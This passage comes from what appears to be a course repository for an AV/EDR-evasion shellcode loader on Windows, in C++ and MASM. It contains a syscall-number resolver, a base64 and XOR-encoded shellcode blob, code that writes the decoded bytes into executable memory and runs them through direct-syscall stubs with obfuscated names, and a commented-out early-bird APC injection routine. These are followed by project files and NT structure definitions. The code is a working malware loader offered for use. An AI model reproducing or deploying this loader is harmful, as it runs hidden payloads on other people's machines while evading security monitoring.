PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
// Is this a system call?
if (*(USHORT*)FunctionName == 0x775a)
{
Entries[i].Hash = SW3_HashSyscall(FunctionName);
Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));
i++;
if (i == SW3_MAX_ENTRIES) break;
}
} while (--NumberOfNames);
// Save total number of system calls found.
SW3_SyscallList.Count = i;
// Sort the list by address in ascending order.
for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)
{
for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)
{
if (Entries[j].Address > Entries[j + 1].Address)
{
// Swap entries.
SW3_SYSCALL_ENTRY TempEntry;
TempEntry.Hash = Entries[j].Hash;
TempEntry.Address = Entries[j].Address;
TempEntry.SyscallAddress = Entries[j].SyscallAddress;
Entries[j].Hash = Entries[j + 1].Hash;
Entries[j].Address = Entries[j + 1].Address;
Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;
Entries[j + 1].Hash = TempEntry.Hash;
Entries[j + 1].Address = TempEntry.Address;
Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;
}
}
}
return TRUE;
}
EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
{
// Ensure SW3_SyscallList is populated.
if (!SW3_PopulateSyscallList()) return -1;
for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
{
if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
{
return i;
}
}
return -1;
}
EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
{
// Ensure SW3_SyscallList is populated.
if (!SW3_PopulateSyscallList()) return NULL;
for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
{
if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
{
return SW3_SyscallList.Entries[i].SyscallAddress;
}
}
return NULL;
}
EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
{
// Ensure SW3_SyscallList is populated.
if (!SW3_PopulateSyscallList()) return NULL;
DWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;
while (FunctionHash == SW3_SyscallList.Entries[index].Hash) {
// Spoofing the syscall return address
index = ((DWORD)rand()) % SW3_SyscallList.Count;
}
return SW3_SyscallList.Entries[index].SyscallAddress;
}
int main()
{
bool all_tests_passed = false;
std::string rest2_reference = "9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ@@";
std::string rest3_reference = replace(rest2_reference, "@@", "==");
std::string rest2_decoded = base64_decode(rest3_reference);
const char* S = rest2_decoded.c_str();
HANDLE hProc = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
8696
);
SYSTEM_INFO sys_inf;
GetSystemInfo(&sys_inf);
DWORD page_size{ sys_inf.dwPageSize };
DWORD alloc_gran{ sys_inf.dwAllocationGranularity };
SIZE_T szVmResv{ alloc_gran };
SIZE_T szVmCmm{ page_size };
DWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;
DWORD cVmCmm = szVmResv / szVmCmm;
LPVOID vmBaseAddress = GetSuitableBaseAddress(
hProc,
szVmCmm,
szVmResv,
cVmResv
);
LPVOID currentVmBase{ vmBaseAddress };
NTSTATUS status{ 0 };
vector<LPVOID> vcVmResv;
//alloc memeory
for (int i = 1; i <= cVmResv; ++i)
{
status = BNtAVM(
hProc,
¤tVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status) {
vcVmResv.push_back(currentVmBase);
}
else {
std::cout << "AVM error";
}
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
DWORD offsetSc{ 0 };
DWORD oldProt;
double prcDone{ 0 };
DWORD cmm_i;
for (int i = 0; i < cVmResv; ++i)
{
unsigned char* sc = new unsigned char[szVmCmm];
for (int j = 0; j < szVmCmm; j++) {
//cout << szVmCmm * i + j << endl;
sc[j] = S[szVmCmm * i + j] ^ XOR_KEY;
}
void* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, sc, rest2_decoded.length());
//((void(*)())exec)();
/*
HANDLE hThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)exec,
NULL,
0,
NULL);
if (hThread == NULL)
{
return 1;
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}*/
/*
CreateThread
HANDLE hThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)exec,
NULL,
0,
NULL);
if (hThread == NULL)
{
return 1;
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
*/
//eariler bird APC
/*
SIZE_T shellSize = 4096;
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
HANDLE victimProcess = pi.hProcess;
HANDLE threadHandle = pi.hThread;
LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
WriteProcessMemory(victimProcess, shellAddress, exec, shellSize, NULL);
QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
ResumeThread(threadHandle);
*/
//((void(*)())exec)();
HANDLE hThread{ nullptr };
ANtCTE(
&hThread,
THREAD_ALL_ACCESS,
NULL,
GetCurrentProcess(),
(LPTHREAD_START_ROUTINE)exec,
NULL,
NULL,
0,
0,
0,
nullptr
);
WaitForSingleObject(hThread, INFINITE);
}
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
<MASM Include="nt.asm">
<FileType>CppCode</FileType>
</MASM>
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
<ClInclude Include="nt.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="nt.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo3/demo1/nt.asm
================================================
.code
EXTERN SW3_GetSyscallNumber: PROC
bye :
ret
NtCreateThreadEx PROC
mov [rsp +8], rcx ; Save registers.
mov [rsp+16], rdx
mov [rsp+24], r8
mov [rsp+32], r9
sub rsp, 28h
mov ecx, 03EA48B99h ; Load function hash into ECX.
call SW3_GetSyscallNumber ; Resolve function hash into syscall number.
add rsp, 28h
mov rcx, [rsp+8] ; Restore registers.
mov rdx, [rsp+16]
mov r8, [rsp+24]
mov r9, [rsp+32]
mov r10, rcx
syscall ; Invoke system call.
ret
NtCreateThreadEx ENDP
ANtCTE proc
mov r12, rcx
mov r13, rdx
mov r14, r8
mov r15, r9
mov r10, rcx
xor rax, rax
add eax, 0C1h ; 2004, 20H2
syscall
cmp rax, 00
je bye
mov rcx, r12
mov rdx, r13
mov r8, r14
mov r9, r15
mov r10, rcx
xor rax, rax
add eax, 0BDh ; 1903, 1909
syscall
cmp rax, 00
je bye
mov rcx, r12
mov rdx, r13
mov r8, r14
mov r9, r15
mov r10, rcx
xor rax, rax
add eax, 0BCh ; 1809
syscall
cmp rax, 00
je bye
ANtCTE endp
BNtAVM proc
mov r8, r10
mov r10, 01h
xor r10, r10
mov r10, 0Ah
mov r10, rcx
xor eax, eax
sub r8, r10
add eax, 18h; 1507 +
xor r8, r8
syscall
ret
BNtAVM endp
BNtWVM proc
add rcx, 0Ah
xor eax, eax
mov r10, rcx
add eax, 3Ah; 1507 +
sub r10, 0Ah
sub rcx, 0Ah
syscall
ret
BNtWVM endp
BNtPVM proc
add r10, 1Ch
xor eax, eax
mov r10, rcx
sub r10, 01h
add eax, 50h; 1507 +
add r10, 01h
syscall
ret
BNtPVM endp
end
================================================
FILE: chapter4-demo3/demo1/nt.h
================================================
#pragma once
#ifndef SW3_HEADER_H_
#define SW3_HEADER_H_
#include <windows.h>
#define SW3_SEED 0xA8EC79BB
#define SW3_ROL8(v) (v << 8 | v >> 24)
#define SW3_ROR8(v) (v >> 8 | v << 24)
#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))
#define SW3_MAX_ENTRIES 500
#define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
#define STATUS_SUCCESS 0
EXTERN_C NTSTATUS BNtAVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
EXTERN_C NTSTATUS BNtWVM(
HANDLE hProcess,
PVOID lpBaseAddress,
PVOID lpBuffer,
SIZE_T NumberOfBytesToRead,
PSIZE_T NumberOfBytesRead
);
EXTERN_C NTSTATUS BNtPVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
SIZE_T* NumberOfBytesToProtect,
ULONG NewAccessProtection,
PULONG OldAccessProtection
);
typedef struct _SW3_SYSCALL_ENTRY
{
DWORD Hash;
DWORD Address;
PVOID SyscallAddress;
} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;
typedef struct _SW3_SYSCALL_LIST
{
DWORD Count;
SW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];
} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;
typedef struct _SW3_PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;
typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks;
PVOID Reserved2[2];
PVOID DllBase;
} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;
typedef struct _SW3_PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PSW3_PEB_LDR_DATA Ldr;
} SW3_PEB, * PSW3_PEB;
DWORD SW3_HashSyscall(PCSTR FunctionName);
BOOL SW3_PopulateSyscallList();
EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);
EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);
EXTERN_C PVOID internal_cleancall_wow64_gate(VOID);
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
{
PVOID pValue;
ULONG ValueLength;
} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
{
ULONG64 Version;
UNICODE_STRING Name;
} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;
typedef struct _WNF_TYPE_ID
{
GUID TypeId;
} WNF_TYPE_ID, * PWNF_TYPE_ID;
typedef enum _PS_CREATE_STATE
{
PsCreateInitialState,
PsCreateFailOnFileOpen,
PsCreateFailOnSectionCreate,
PsCreateFailExeFormat,
PsCreateFailMachineMismatch,
PsCreateFailExeName,
PsCreateSuccess,
PsCreateMaximumStates
} PS_CREATE_STATE, * PPS_CREATE_STATE;
typedef enum _KCONTINUE_TYPE
{
KCONTINUE_UNWIND,
KCONTINUE_RESUME,
KCONTINUE_LONGJUMP,
KCONTINUE_SET,
KCONTINUE_LAST
} KCONTINUE_TYPE;
typedef struct _IO_STATUS_BLOCK
{
union
{
NTSTATUS Status;
VOID* Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef enum _PLUGPLAY_EVENT_CATEGORY
{
HardwareProfileChangeEvent,
TargetDeviceChangeEvent,
DeviceClassChangeEvent,
CustomDeviceEvent,
DeviceInstallEvent,
DeviceArrivalEvent,
PowerEvent,
VetoEvent,
BlockedDriverEvent,
InvalidIDEvent,
MaxPlugEventCategory
} PLUGPLAY_EVENT_CATEGORY, * PPLUGPLAY_EVENT_CATEGORY;
typedef enum _PNP_VETO_TYPE
{
PNP_VetoTypeUnknown, // unspecified
PNP_VetoLegacyDevice, // instance path
PNP_VetoPendingClose, // instance path
PNP_VetoWindowsApp, // module
PNP_VetoWindowsService, // service
PNP_VetoOutstandingOpen, // instance path
PNP_VetoDevice, // instance path
PNP_VetoDriver, // driver service name
PNP_VetoIllegalDeviceRequest, // instance path
PNP_VetoInsufficientPower, // unspecified
PNP_VetoNonDisableable, // instance path
PNP_VetoLegacyDriver, // service
PNP_VetoInsufficientRights // unspecified
} PNP_VETO_TYPE, * PPNP_VETO_TYPE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
{
UNICODE_STRING Name;
USHORT ValueType;
USHORT Reserved;
ULONG Flags;
ULONG ValueCount;
union
{
PLONG64 pInt64;
PULONG64 pUint64;
PUNICODE_STRING pString;
PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;
PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;
} Values;
} TOKEN_SECURITY_ATTRIBUTE_V1, * PTOKEN_SECURITY_ATTRIBUTE_V1;
typedef VOID(KNORMAL_ROUTINE) (
IN PVOID NormalContext,
IN PVOID SystemArgument1,
IN PVOID SystemArgument2);
typedef struct _PS_ATTRIBUTE
{
ULONG Attribute;
SIZE_T Size;
union
{
ULONG Value;
PVOID ValuePtr;
} u1;
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;
typedef struct _WNF_STATE_NAME
{
ULONG Data[2];
} WNF_STATE_NAME, * PWNF_STATE_NAME;
#ifndef InitializeObjectAttributes
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#endif
typedef struct _KEY_VALUE_ENTRY
{
PUNICODE_STRING ValueName;
ULONG DataLength;
ULONG DataOffset;
ULONG Type;
} KEY_VALUE_ENTRY, * PKEY_VALUE_ENTRY;
typedef enum _KEY_SET_INFORMATION_CLASS
{
KeyWriteTimeInformation,
KeyWow64FlagsInformation,
KeyControlFlagsInformation,
KeySetVirtualizationInformation,
KeySetDebugInformation,
KeySetHandleTagsInformation,
MaxKeySetInfoClass // MaxKeySetInfoClass should always be the last enum.
} KEY_SET_INFORMATION_CLASS, * PKEY_SET_INFORMATION_CLASS;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemHandleInformation = 16,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45,
SystemCodeIntegrityInformation = 103,
SystemPolicyInformation = 134,
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
typedef enum _PROCESSINFOCLASS
{
ProcessBasicInformation = 0,
ProcessDebugPort = 7,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessBreakOnTermination = 29
} PROCESSINFOCLASS, * PPROCESSINFOCLASS;
typedef struct _MEMORY_RANGE_ENTRY
{
PVOID VirtualAddress;
SIZE_T NumberOfBytes;
} MEMORY_RANGE_ENTRY, * PMEMORY_RANGE_ENTRY;
typedef struct _T2_SET_PARAMETERS_V0
{
ULONG Version;
ULONG Reserved;
LONGLONG NoWakeTolerance;
} T2_SET_PARAMETERS, * PT2_SET_PARAMETERS;
typedef struct _FILE_PATH
{
ULONG Version;
ULONG Length;
ULONG Type;
CHAR FilePath[1];
} FILE_PATH, * PFILE_PATH;
typedef struct _FILE_USER_QUOTA_INFORMATION
{
ULONG NextEntryOffset;
ULONG SidLength;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER QuotaUsed;
LARGE_INTEGER QuotaThreshold;
LARGE_INTEGER QuotaLimit;
SID Sid[1];
} FILE_USER_QUOTA_INFORMATION, * PFILE_USER_QUOTA_INFORMATION;
typedef struct _FILE_QUOTA_LIST_INFORMATION
{
ULONG NextEntryOffset;
ULONG SidLength;
SID Sid[1];
} FILE_QUOTA_LIST_INFORMATION, * PFILE_QUOTA_LIST_INFORMATION;
typedef struct _FILE_NETWORK_OPEN_INFORMATION
{
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
ULONG Unknown;
} FILE_NETWORK_OPEN_INFORMATION, * PFILE_NETWORK_OPEN_INFORMATION;
typedef enum _FILTER_BOOT_OPTION_OPERATION
{
FilterBootOptionOperationOpenSystemStore,
FilterBootOptionOperationSetElement,
FilterBootOptionOperationDeleteElement,
FilterBootOptionOperationMax
} FILTER_BOOT_OPTION_OPERATION, * PFILTER_BOOT_OPTION_OPERATION;
typedef enum _EVENT_TYPE
{
NotificationEvent = 0,
SynchronizationEvent = 1,
} EVENT_TYPE, * PEVENT_TYPE;
